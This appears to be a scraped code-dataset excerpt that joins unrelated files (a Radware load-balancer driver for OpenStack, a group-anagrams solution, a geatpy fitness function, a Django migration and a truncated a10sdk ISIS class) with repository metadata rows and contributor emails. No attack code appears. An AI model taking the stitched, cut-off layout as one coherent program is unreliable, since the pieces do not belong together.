from neutron_lbaas.drivers.radware import base_v2_driver
from neutron_lbaas.drivers.radware import exceptions as r_exc
from neutron_lbaas.drivers.radware import rest_client as rest
CERT_MANAGER_PLUGIN = neutron_lbaas.common.cert_manager.get_backend()
TEMPLATE_HEADER = {'Content-Type':
'application/vnd.com.radware.vdirect.'
'template-parameters+json'}
PROVISION_HEADER = {'Content-Type':
'application/vnd.com.radware.'
'vdirect.status+json'}
CREATE_SERVICE_HEADER = {'Content-Type':
'application/vnd.com.radware.'
'vdirect.adc-service-specification+json'}
PROPERTY_DEFAULTS = {'type': 'none',
'cookie_name': 'none',
'url_path': '/',
'http_method': 'GET',
'expected_codes': '200',
'subnet': '255.255.255.255',
'mask': '255.255.255.255',
'gw': '255.255.255.255',
}
LOADBALANCER_PROPERTIES = ['vip_address', 'admin_state_up']
LISTENER_PROPERTIES = ['id', 'protocol_port', 'protocol',
'connection_limit', 'admin_state_up']
POOL_PROPERTIES = ['id', 'protocol', 'lb_algorithm', 'admin_state_up']
MEMBER_PROPERTIES = ['id', 'address', 'protocol_port', 'weight',
'admin_state_up', 'subnet', 'mask', 'gw']
SESSION_PERSISTENCY_PROPERTIES = ['type', 'cookie_name']
HEALTH_MONITOR_PROPERTIES = ['type', 'delay', 'timeout', 'max_retries',
'admin_state_up', 'url_path', 'http_method',
'expected_codes', 'id']
LOG = logging.getLogger(__name__)
class RadwareLBaaSV2Driver(base_v2_driver.RadwareLBaaSBaseV2Driver):
#
# Assumptions:
# 1) We have only one worflow that takes care of l2-l4 and service creation
# 2) The workflow template exists on the vDirect server
# 3) The workflow expose one operaion named 'update' (plus ctor and dtor)
# 4) The 'update' operation gets the loadbalancer object graph as input
# 5) The object graph is enehanced by our code before it is sent to the
# workflow
# 6) Async operations are handled by a different thread
#
def __init__(self, plugin):
base_v2_driver.RadwareLBaaSBaseV2Driver.__init__(self, plugin)
rad = cfg.CONF.radwarev2
rad_debug = cfg.CONF.radwarev2_debug
self.plugin = plugin
self.service = {
"name": "_REPLACE_",
"tenantId": "_REPLACE_",
"haPair": rad.service_ha_pair,
"sessionMirroringEnabled": rad.service_session_mirroring_enabled,
"primary": {
"capacity": {
"throughput": rad.service_throughput,
"sslThroughput": rad.service_ssl_throughput,
"compressionThroughput":
rad.service_compression_throughput,
"cache": rad.service_cache
},
"network": {
"type": "portgroup",
"portgroups": '_REPLACE_'
},
"adcType": rad.service_adc_type,
"acceptableAdc": "Exact"
}
}
if rad.service_resource_pool_ids:
ids = rad.service_resource_pool_ids
self.service['resourcePoolIds'] = [
{'id': id} for id in ids
]
else:
self.service['resourcePoolIds'] = []
if rad.service_isl_vlan:
self.service['islVlan'] = rad.service_isl_vlan
self.workflow_template_name = rad.workflow_template_name
self.child_workflow_template_names = rad.child_workflow_template_names
self.workflow_params = rad.workflow_params
self.workflow_action_name = rad.workflow_action_name
self.stats_action_name = rad.stats_action_name
vdirect_address = rad.vdirect_address
sec_server = rad.ha_secondary_address
self.rest_client = rest.vDirectRESTClient(
server=vdirect_address,
secondary_server=sec_server,
user=rad.vdirect_user,
password=rad.vdirect_password)
self.workflow_params['provision_service'] = rad_debug.provision_service
self.workflow_params['configure_l3'] = rad_debug.configure_l3
self.workflow_params['configure_l4'] = rad_debug.configure_l4
self.queue = Queue.Queue()
self.completion_handler = OperationCompletionHandler(self.queue,
self.rest_client,
plugin)
self.workflow_templates_exists = False
self.completion_handler.setDaemon(True)
self.completion_handler_started = False
def _start_completion_handling_thread(self):
if not self.completion_handler_started:
LOG.info(_LI('Starting operation completion handling thread'))
self.completion_handler.start()
self.completion_handler_started = True
@staticmethod
def _get_wf_name(lb):
return 'LB_' + lb.id
@log_helpers.log_method_call
def _verify_workflow_templates(self):
"""Verify the existence of workflows on vDirect server."""
resource = '/api/workflowTemplate/'
workflow_templates = {self.workflow_template_name: False}
for child_wf_name in self.child_workflow_template_names:
workflow_templates[child_wf_name] = False
response = _rest_wrapper(self.rest_client.call('GET',
resource,
None,
None), [200])
for workflow_template in workflow_templates.keys():
for template in response:
if workflow_template == template['name']:
workflow_templates[workflow_template] = True
break
for template, found in workflow_templates.items():
if not found:
raise r_exc.WorkflowTemplateMissing(
workflow_template=template)
@log_helpers.log_method_call
def workflow_exists(self, lb):
"""Create workflow for loadbalancer instance"""
wf_name = self._get_wf_name(lb)
wf_resource = '/api/workflow/%s' % (wf_name)
try:
_rest_wrapper(self.rest_client.call(
'GET', wf_resource, None, None),
[200])
except Exception:
return False
return True
@log_helpers.log_method_call
def _create_workflow(self, lb, lb_network_id, proxy_network_id):
"""Create workflow for loadbalancer instance"""
self._verify_workflow_templates()
wf_name = self._get_wf_name(lb)
service = copy.deepcopy(self.service)
service['tenantId'] = lb.tenant_id
service['name'] = 'srv_' + lb_network_id
if lb_network_id != proxy_network_id:
self.workflow_params["twoleg_enabled"] = True
service['primary']['network']['portgroups'] = [
lb_network_id, proxy_network_id]
else:
self.workflow_params["twoleg_enabled"] = False
service['primary']['network']['portgroups'] = [lb_network_id]
tmpl_resource = '/api/workflowTemplate/%s?name=%s' % (
self.workflow_template_name, wf_name)
_rest_wrapper(self.rest_client.call(
'POST', tmpl_resource,
{'parameters': dict(self.workflow_params,
service_params=service)},
TEMPLATE_HEADER))
@log_helpers.log_method_call
def get_stats(self, ctx, lb):
wf_name = self._get_wf_name(lb)
resource = '/api/workflow/%s/action/%s' % (
wf_name, self.stats_action_name)
response = _rest_wrapper(self.rest_client.call('POST', resource,
None, TEMPLATE_HEADER), success_codes=[202])
LOG.debug('stats_action response: %s ', response)
resource = '/api/workflow/%s/parameters' % (wf_name)
response = _rest_wrapper(self.rest_client.call('GET', resource,
None, TEMPLATE_HEADER), success_codes=[200])
LOG.debug('stats_values response: %s ', response)
return response['stats']
@log_helpers.log_method_call
def execute_workflow(self, ctx, manager, data_model,
old_data_model=None, delete=False):
lb = data_model.root_loadbalancer
# Get possible proxy subnet.
# Proxy subnet equals to LB subnet if no proxy
# is necessary.
# Get subnet id of any member located on different than
# loadbalancer's network. If returned subnet id is the subnet id
# of loadbalancer - all members are accessible from loadbalancer's
# network, meaning no second leg or static routes are required.
# Otherwise, create proxy port on found member's subnet and get its
# address as a proxy address for loadbalancer instance
lb_subnet = self.plugin.db._core_plugin.get_subnet(
ctx, lb.vip_subnet_id)
proxy_subnet = lb_subnet
proxy_port_address = lb.vip_address
if not self.workflow_exists(lb):
# Create proxy port if needed
proxy_port_subnet_id = self._get_proxy_port_subnet_id(lb)
if proxy_port_subnet_id != lb.vip_subnet_id:
proxy_port = self._create_proxy_port(
ctx, lb, proxy_port_subnet_id)
proxy_subnet = self.plugin.db._core_plugin.get_subnet(
ctx, proxy_port['subnet_id'])
proxy_port_address = proxy_port['ip_address']
self._create_workflow(lb,
lb_subnet['network_id'],
proxy_subnet['network_id'])
else:
# Check if proxy port exists
proxy_port = self._get_proxy_port(ctx, lb)
if proxy_port:
proxy_subnet = self.plugin.db._core_plugin.get_subnet(
ctx, proxy_port['subnet_id'])
proxy_port_address = proxy_port['ip_address']
# Build objects graph
objects_graph = self._build_objects_graph(ctx, lb, data_model,
proxy_port_address,
proxy_subnet)
LOG.debug("Radware vDirect LB object graph is " + str(objects_graph))
wf_name = self._get_wf_name(lb)
resource = '/api/workflow/%s/action/%s' % (
wf_name, self.workflow_action_name)
response = _rest_wrapper(self.rest_client.call('POST', resource,
{'parameters': objects_graph},
TEMPLATE_HEADER), success_codes=[202])
LOG.debug('_update_workflow response: %s ', response)
oper = OperationAttributes(
manager, response['uri'], lb,
data_model, old_data_model,
delete=delete)
LOG.debug('Pushing operation %s to the queue', oper)
self._start_completion_handling_thread()
self.queue.put_nowait(oper)
def remove_workflow(self, ctx, manager, lb):
wf_name = self._get_wf_name(lb)
LOG.debug('Remove the workflow %s' % wf_name)
resource = '/api/workflow/%s' % (wf_name)
rest_return = self.rest_client.call('DELETE', resource, None, None)
response = _rest_wrapper(rest_return, [204, 202, 404])
if rest_return[rest.RESP_STATUS] in [404]:
try:
self._delete_proxy_port(ctx, lb)
LOG.debug('Proxy port for LB %s was deleted', lb.id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Proxy port deletion for LB %s '
'failed'), lb.id)
manager.successful_completion(ctx, lb, delete=True)
else:
oper = OperationAttributes(
manager, response['uri'], lb,
lb, old_data_model=None,
delete=True,
post_operation_function=self._delete_proxy_port)
self._start_completion_handling_thread()
self.queue.put_nowait(oper)
def _build_objects_graph(self, ctx, lb, data_model,
proxy_port_address, proxy_subnet):
"""Iterate over the LB model starting from root lb entity
and build its JSON representtaion for vDirect
"""
graph = {}
for prop in LOADBALANCER_PROPERTIES:
graph[prop] = getattr(lb, prop, PROPERTY_DEFAULTS.get(prop))
graph['pip_address'] = proxy_port_address
graph['listeners'] = []
listeners = [
listener for listener in lb.listeners
if listener.provisioning_status != constants.PENDING_DELETE and
(listener.default_pool and listener.default_pool.members)]
for listener in listeners:
listener_dict = {}
for prop in LISTENER_PROPERTIES:
listener_dict[prop] = getattr(
listener, prop, PROPERTY_DEFAULTS.get(prop))
cert_mgr = CERT_MANAGER_PLUGIN.CertManager()
if listener.default_tls_container_id:
default_cert = cert_mgr.get_cert(
project_id=listener.tenant_id,
cert_ref=listener.default_tls_container_id,
resource_ref=cert_mgr.get_service_url(
listener.loadbalancer_id),
service_name='Neutron LBaaS v2 Radware provider')
cert_dict = {
'id': listener.default_tls_container_id,
'certificate': default_cert.get_certificate(),
'intermediates': default_cert.get_intermediates(),
'private_key': default_cert.get_private_key(),
'passphrase': default_cert.get_private_key_passphrase()}
listener_dict['default_tls_certificate'] = cert_dict
if listener.sni_containers:
listener_dict['sni_tls_certificates'] = []
for sni_container in listener.sni_containers:
sni_cert = cert_mgr.get_cert(
project_id=listener.tenant_id,
cert_ref=sni_container.tls_container_id,
resource_ref=cert_mgr.get_service_url(
listener.loadbalancer_id),
service_name='Neutron LBaaS v2 Radware provider')
listener_dict['sni_tls_certificates'].append(
{'id': sni_container.tls_container_id,
'position': sni_container.position,
'certificate': sni_cert.get_certificate(),
'intermediates': sni_cert.get_intermediates(),
'private_key': sni_cert.get_private_key(),
'passphrase': sni_cert.get_private_key_passphrase()})
if (listener.default_pool and
listener.default_pool.provisioning_status !=
constants.PENDING_DELETE):
pool_dict = {}
for prop in POOL_PROPERTIES:
pool_dict[prop] = getattr(
listener.default_pool, prop,
PROPERTY_DEFAULTS.get(prop))
if (listener.default_pool.healthmonitor and
listener.default_pool.healthmonitor.provisioning_status !=
constants.PENDING_DELETE):
hm_dict = {}
for prop in HEALTH_MONITOR_PROPERTIES:
hm_dict[prop] = getattr(
listener.default_pool.healthmonitor, prop,
PROPERTY_DEFAULTS.get(prop))
pool_dict['healthmonitor'] = hm_dict
if listener.default_pool.session_persistence:
sess_pers_dict = {}
for prop in SESSION_PERSISTENCY_PROPERTIES:
sess_pers_dict[prop] = getattr(
listener.default_pool.session_persistence, prop,
PROPERTY_DEFAULTS.get(prop))
pool_dict['sessionpersistence'] = sess_pers_dict
pool_dict['members'] = []
members = [
member for member in listener.default_pool.members
if member.provisioning_status != constants.PENDING_DELETE]
for member in members:
member_dict = {}
for prop in MEMBER_PROPERTIES:
member_dict[prop] = getattr(
member, prop,
PROPERTY_DEFAULTS.get(prop))
if (proxy_port_address != lb.vip_address and
netaddr.IPAddress(member.address)
not in netaddr.IPNetwork(proxy_subnet['cidr'])):
self._accomplish_member_static_route_data(
ctx, member, member_dict,
proxy_subnet['gateway_ip'])
pool_dict['members'].append(member_dict)
listener_dict['default_pool'] = pool_dict
graph['listeners'].append(listener_dict)
return graph
def _get_proxy_port_subnet_id(self, lb):
"""Look for at least one member of any listener's pool
that is located on subnet different than loabalancer's subnet.
If such member found, return its subnet id.
Otherwise, return loadbalancer's subnet id
"""
for listener in lb.listeners:
if listener.default_pool:
for member in listener.default_pool.members:
if lb.vip_subnet_id != member.subnet_id:
return member.subnet_id
return lb.vip_subnet_id
def _create_proxy_port(self,
ctx, lb, proxy_port_subnet_id):
"""Check if proxy port was created earlier.
If not, create a new port on proxy subnet and return its ip address.
Returns port IP address
"""
proxy_port = self._get_proxy_port(ctx, lb)
if proxy_port:
LOG.info(_LI('LB %(lb_id)s proxy port exists on subnet \
%(subnet_id)s with ip address %(ip_address)s') %
{'lb_id': lb.id, 'subnet_id': proxy_port['subnet_id'],
'ip_address': proxy_port['ip_address']})
return proxy_port
proxy_port_name = 'proxy_' + lb.id
proxy_port_subnet = self.plugin.db._core_plugin.get_subnet(
ctx, proxy_port_subnet_id)
proxy_port_data = {
'tenant_id': lb.tenant_id,
'name': proxy_port_name,
'network_id': proxy_port_subnet['network_id'],
'mac_address': attributes.ATTR_NOT_SPECIFIED,
'admin_state_up': False,
'device_id': '',
'device_owner': 'neutron:' + constants.LOADBALANCERV2,
'fixed_ips': [{'subnet_id': proxy_port_subnet_id}]
}
proxy_port = self.plugin.db._core_plugin.create_port(
ctx, {'port': proxy_port_data})
proxy_port_ip_data = proxy_port['fixed_ips'][0]
LOG.info(_LI('LB %(lb_id)s proxy port created on subnet %(subnet_id)s \
with ip address %(ip_address)s') %
{'lb_id': lb.id, 'subnet_id': proxy_port_ip_data['subnet_id'],
'ip_address': proxy_port_ip_data['ip_address']})
return proxy_port_ip_data
def _get_proxy_port(self, ctx, lb):
ports = self.plugin.db._core_plugin.get_ports(
ctx, filters={'name': ['proxy_' + lb.id], })
if not ports:
return None
proxy_port = ports[0]
return proxy_port['fixed_ips'][0]
def _delete_proxy_port(self, ctx, lb):
port_filter = {
'name': ['proxy_' + lb.id],
}
ports = self.plugin.db._core_plugin.get_ports(
ctx, filters=port_filter)
if ports:
proxy_port = ports[0]
proxy_port_ip_data = proxy_port['fixed_ips'][0]
try:
LOG.info(_LI('Deleting LB %(lb_id)s proxy port on subnet \
%(subnet_id)s with ip address %(ip_address)s') %
{'lb_id': lb.id,
'subnet_id': proxy_port_ip_data['subnet_id'],
'ip_address': proxy_port_ip_data['ip_address']})
self.plugin.db._core_plugin.delete_port(
ctx, proxy_port['id'])
except Exception as exception:
# stop exception propagation, nport may have
# been deleted by other means
LOG.warning(_LW('Proxy port deletion failed: %r'),
exception)
def _accomplish_member_static_route_data(self,
ctx, member, member_data, proxy_gateway_ip):
member_ports = self.plugin.db._core_plugin.get_ports(
ctx,
filters={'fixed_ips': {'ip_address': [member.address]},
'tenant_id': [member.tenant_id]})
if len(member_ports) == 1:
member_port = member_ports[0]
member_port_ip_data = member_port['fixed_ips'][0]
LOG.debug('member_port_ip_data:' + repr(member_port_ip_data))
member_subnet = self.plugin.db._core_plugin.get_subnet(
ctx,
member_port_ip_data['subnet_id'])
LOG.debug('member_subnet:' + repr(member_subnet))
member_network = netaddr.IPNetwork(member_subnet['cidr'])
member_data['subnet'] = str(member_network.network)
member_data['mask'] = str(member_network.netmask)
else:
member_data['subnet'] = member_data['address']
member_data['gw'] = proxy_gateway_ip
class OperationCompletionHandler(threading.Thread):
"""Update DB with operation status or delete the entity from DB."""
def __init__(self, queue, rest_client, plugin):
threading.Thread.__init__(self)
self.queue = queue
self.rest_client = rest_client
self.plugin = plugin
self.stoprequest = threading.Event()
self.opers_to_handle_before_rest = 0
def join(self, timeout=None):
self.stoprequest.set()
super(OperationCompletionHandler, self).join(timeout)
def handle_operation_completion(self, oper):
result = self.rest_client.call('GET',
oper.operation_url,
None,
None)
LOG.debug('Operation completion requested %(uri) and got: %(result)',
{'uri': oper.operation_url, 'result': result})
completed = result[rest.RESP_DATA]['complete']
reason = result[rest.RESP_REASON],
description = result[rest.RESP_STR]
if completed:
# operation is done - update the DB with the status
# or delete the entire graph from DB
success = result[rest.RESP_DATA]['success']
sec_to_completion = time.time() - oper.creation_time
debug_data = {'oper': oper,
'sec_to_completion': sec_to_completion,
'success': success}
LOG.debug('Operation %(oper)s is completed after '
'%(sec_to_completion)d sec '
'with success status: %(success)s :',
debug_data)
if not success:
# failure - log it and set the return ERROR as DB state
if reason or description:
msg = 'Reason:%s. Description:%s' % (reason, description)
else:
msg = "unknown"
error_params = {"operation": oper, "msg": msg}
LOG.error(_LE(
'Operation %(operation)s failed. Reason: %(msg)s'),
error_params)
oper.status = constants.ERROR
OperationCompletionHandler._run_post_failure_function(oper)
else:
oper.status = constants.ACTIVE
OperationCompletionHandler._run_post_success_function(oper)
return completed
def run(self):
while not self.stoprequest.isSet():
try:
oper = self.queue.get(timeout=1)
# Get the current queue size (N) and set the counter with it.
# Handle N operations with no intermission.
# Once N operations handles, get the size again and repeat.
if self.opers_to_handle_before_rest <= 0:
self.opers_to_handle_before_rest = self.queue.qsize() + 1
LOG.debug('Operation consumed from the queue: ' +
str(oper))
# check the status - if oper is done: update the db ,
# else push the oper again to the queue
if not self.handle_operation_completion(oper):
LOG.debug('Operation %s is not completed yet..' % oper)
# Not completed - push to the queue again
self.queue.put_nowait(oper)
self.queue.task_done()
self.opers_to_handle_before_rest -= 1
# Take one second rest before start handling
# new operations or operations handled before
if self.opers_to_handle_before_rest <= 0:
time.sleep(1)
except Queue.Empty:
continue
except Exception:
LOG.error(_LE(
"Exception was thrown inside OperationCompletionHandler"))
@staticmethod
def _run_post_success_function(oper):
try:
ctx = context.get_admin_context()
if oper.post_operation_function:
oper.post_operation_function(ctx, oper.data_model)
oper.manager.successful_completion(ctx, oper.data_model,
delete=oper.delete)
LOG.debug('Post-operation success function completed '
'for operation %s',
repr(oper))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Post-operation success function failed '
'for operation %s'),
repr(oper))
@staticmethod
def _run_post_failure_function(oper):
try:
ctx = context.get_admin_context()
oper.manager.failed_completion(ctx, oper.data_model)
LOG.debug('Post-operation failure function completed '
'for operation %s',
repr(oper))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Post-operation failure function failed '
'for operation %s'),
repr(oper))
class OperationAttributes(object):
"""Holds operation attributes"""
def __init__(self,
manager,
operation_url,
lb,
data_model=None,
old_data_model=None,
delete=False,
post_operation_function=None):
self.manager = manager
self.operation_url = operation_url
self.lb = lb
self.data_model = data_model
self.old_data_model = old_data_model
self.delete = delete
self.post_operation_function = post_operation_function
self.creation_time = time.time()
def __repr__(self):
attrs = self.__dict__
items = ("%s = %r" % (k, v) for k, v in attrs.items())
return "<%s: {%s}>" % (self.__class__.__name__, ', '.join(items))
def _rest_wrapper(response, success_codes=None):
"""Wrap a REST call and make sure a valido status is returned."""
success_codes = success_codes or [202]
if not response:
raise r_exc.RESTRequestFailure(
status=-1,
reason="Unknown",
description="Unknown",
success_codes=success_codes
)
elif response[rest.RESP_STATUS] not in success_codes:
raise r_exc.RESTRequestFailure(
status=response[rest.RESP_STATUS],
reason=response[rest.RESP_REASON],
description=response[rest.RESP_STR],
success_codes=success_codes
)
else:
LOG.debug("this is a respone: %s" % (response,))
return response[rest.RESP_DATA]
| [
"tony.pig@gmail.com"
] | tony.pig@gmail.com |
2c3ea8b81536b7c933e4b3a416923e9b9f6d2579 | cbedb18df0aaac810aeea87a2273edb15c1cf899 | /Strings/49. Group Anagrams (python string builder).py | 8b0bb59ac43006a54f171ca77f88aec37cd1619d | [] | no_license | kanglicheng/CodeBreakersCode | 71b833bb9f4c96d520c26f0044365dc62137a940 | 31f7f730227a0e10951e7468bad1b995cf2eafcb | refs/heads/master | 2023-08-07T20:32:05.267695 | 2020-09-14T14:36:25 | 2020-09-14T14:36:25 | 265,978,034 | 0 | 0 | null | 2020-05-22T00:05:29 | 2020-05-22T00:05:29 | null | UTF-8 | Python | false | false | 1,035 | py | # not sure about the solution at start
# sort each str => O(W logW), w is the length of each words -> O(N * W log W) or counting sort O(N*W)
# turn each word into count char list: each list length is fixed:26 -> need O(W) to turn to list
# but lst can't hash -> turn to str then use hash map
class Solution:
def groupAnagrams(self, strs: List[str]) -> List[List[str]]:
_dict = {}
for w in strs:
arr = [0] * 26
for c in w:
index = ord(c) - ord('a')
arr[index] += 1
sortedStr = ""
for v in arr:
sortedStr += (str(v) + "|")
if sortedStr in _dict:
_dict[sortedStr].append(w)
else:
_dict[sortedStr] = [w]
res = []
for val in _dict.values():
res.append(val)
return res
| [
"56766457+Wei-LiHuang@users.noreply.github.com"
] | 56766457+Wei-LiHuang@users.noreply.github.com |
70573600e0f7e3bf2144f550ad7a28e7db17e2c2 | 5f5c052aa6a42e7492daf940c9561f5ce84ecb1c | /geatpy/demo/sentense_search/aimfuc.py | 68a6d1234a3b6ecaa5b0919fae9690a3c6b8f466 | [] | no_license | siuyincheung/geatpy | 8b343087c506cef39a7dc377a667ae9f1392acd4 | 48d41c8835004d9b0c36060881ed9cfb07483f1e | refs/heads/master | 2020-03-27T08:15:57.973576 | 2018-08-27T00:21:00 | 2018-08-27T00:21:00 | 146,237,904 | 1 | 0 | null | 2018-08-27T02:39:41 | 2018-08-27T02:39:41 | null | UTF-8 | Python | false | false | 327 | py | import numpy as np
def aimfuc(Phen):
real = np.array([ord('I'),ord(' '),ord('a'),ord('m'),ord(' '),ord('a'),
ord(' '),ord('l'),ord('i'),ord('t'),ord('t'),ord('l'),
ord('e'),ord(' '),ord('b'),ord('o'),ord('y')])
diff = np.sum((Phen - real)**2, 1)
return np.array([diff]).T
| [
"jazzbin@geatpy.com"
] | jazzbin@geatpy.com |
7a59a1045aed4872467a495c9c8559d6cf22d43b | 716ed8ab9cbd61837fb116635c2d378b32eeb890 | /app/migrations/0004_auto_20180902_0447.py | 2f5b3abdde6abf5825fdd6216228555e3f33be87 | [] | no_license | koneb71/waterworks-django | 19dab148fc46f85e1be55b8440f40f5cf2ea29c6 | 0de58e43ab04348622933f98d79c7d4c109fcb85 | refs/heads/master | 2020-03-28T07:18:50.512581 | 2018-10-15T03:53:05 | 2018-10-15T03:53:05 | 147,893,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-09-02 12:47
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0003_auto_20180902_0447'),
]
operations = [
migrations.AlterField(
model_name='client',
name='account_number',
field=models.CharField(default=b'2018024753', max_length=30),
),
migrations.AlterField(
model_name='client',
name='meter_serial_number',
field=models.CharField(default=b'814296570', max_length=30),
),
migrations.AlterField(
model_name='collection',
name='created_date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 9, 2, 4, 47, 53, 490427)),
),
migrations.AlterField(
model_name='collection',
name='due_date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 10, 2, 4, 47, 53, 490458)),
),
]
| [
"koneb2013@gmail.com"
] | koneb2013@gmail.com |
558c33eace9ec016d663c4af1776962e0dfe13ab | e42a61b7be7ec3412e5cea0ffe9f6e9f34d4bf8d | /a10sdk/core/interface/interface_ve_isis.py | c85a7fd5cba9aee355ac9680bca40c6207de6019 | [
"Apache-2.0"
] | permissive | amwelch/a10sdk-python | 4179565afdc76cdec3601c2715a79479b3225aef | 3e6d88c65bd1a2bf63917d14be58d782e06814e6 | refs/heads/master | 2021-01-20T23:17:07.270210 | 2015-08-13T17:53:23 | 2015-08-13T17:53:23 | 40,673,499 | 0 | 0 | null | 2015-08-13T17:51:35 | 2015-08-13T17:51:34 | null | UTF-8 | Python | false | false | 20,388 | py | from a10sdk.common.A10BaseClass import A10BaseClass
class PriorityList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param priority: {"description": "Set priority for Designated Router election (Priority value)", "format": "number", "default": 64, "maximum": 127, "minimum": 0, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify priority for level-1 routing; 'level-2': Specify priority for level-2 routing; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "priority-list"
self.DeviceProxy = ""
self.priority = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class HelloIntervalMinimalList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param hello_interval_minimal: {"default": 0, "type": "number", "description": "Set Hello holdtime 1 second, interval depends on multiplier", "format": "flag"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello-interval for level-1 IIHs; 'level-2': Specify hello-interval for level-2 IIHs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "hello-interval-minimal-list"
self.DeviceProxy = ""
self.hello_interval_minimal = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class MeshGroup(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"description": "Mesh group number", "format": "number", "maximum": 4294967295, "minimum": 1, "not": "blocked", "type": "number"}
:param blocked: {"default": 0, "not": "value", "type": "number", "description": "Block LSPs on this interface", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "mesh-group"
self.DeviceProxy = ""
self.value = ""
self.blocked = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class BfdCfg(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param disable: {"default": 0, "type": "number", "description": "Disable BFD", "format": "flag"}
:param bfd: {"default": 0, "type": "number", "description": "Bidirectional Forwarding Detection (BFD)", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "bfd-cfg"
self.DeviceProxy = ""
self.disable = ""
self.bfd = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class PasswordList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param password: {"minLength": 1, "maxLength": 254, "type": "string", "description": "Configure the authentication password for interface", "format": "string-rlx"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify password for level-1 PDUs; 'level-2': Specify password for level-2 PDUs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "password-list"
self.DeviceProxy = ""
self.password = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class KeyChainList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param key_chain: {"minLength": 1, "maxLength": 128, "type": "string", "description": "Authentication key-chain (Name of key-chain)", "format": "string"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication key-chain for level-1 PDUs; 'level-2': Specify authentication key-chain for level-2 PDUs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "key-chain-list"
self.DeviceProxy = ""
self.key_chain = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class ModeList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param mode: {"enum": ["md5"], "type": "string", "description": "'md5': Keyed message digest; ", "format": "enum"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication mode for level-1 PDUs; 'level-2': Specify authentication mode for level-2 PDUs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "mode-list"
self.DeviceProxy = ""
self.mode = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class SendOnlyList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param send_only: {"default": 0, "type": "number", "description": "Authentication send-only", "format": "flag"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication send-only for level-1 PDUs; 'level-2': Specify authentication send-only for level-2 PDUs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "send-only-list"
self.DeviceProxy = ""
self.send_only = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Authentication(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param key_chain_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"key-chain": {"minLength": 1, "maxLength": 128, "type": "string", "description": "Authentication key-chain (Name of key-chain)", "format": "string"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication key-chain for level-1 PDUs; 'level-2': Specify authentication key-chain for level-2 PDUs; ", "format": "enum"}}}]}
:param mode_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "mode": {"enum": ["md5"], "type": "string", "description": "'md5': Keyed message digest; ", "format": "enum"}, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication mode for level-1 PDUs; 'level-2': Specify authentication mode for level-2 PDUs; ", "format": "enum"}}}]}
:param send_only_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"send-only": {"default": 0, "type": "number", "description": "Authentication send-only", "format": "flag"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication send-only for level-1 PDUs; 'level-2': Specify authentication send-only for level-2 PDUs; ", "format": "enum"}}}]}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "authentication"
self.DeviceProxy = ""
